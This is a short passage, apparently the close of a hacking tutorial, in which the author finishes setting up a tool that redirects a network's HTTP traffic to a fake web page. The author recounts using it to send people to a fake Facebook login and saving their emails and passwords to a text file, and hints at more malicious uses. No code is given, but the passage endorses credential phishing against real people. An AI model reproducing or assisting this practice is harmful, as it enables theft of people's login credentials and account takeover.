Finally click OK and it will begin redirecting all HTTP traffic to your fake web page; HTTPS connections are not rewritten this way. The few times I've used this I simply redirected people to a fake Facebook login where I saved the email and password to a text file. But this could be used for a much more malicious purpose. If you have any problems or suggestions, tell me in the comments and I'll try to work them out for you.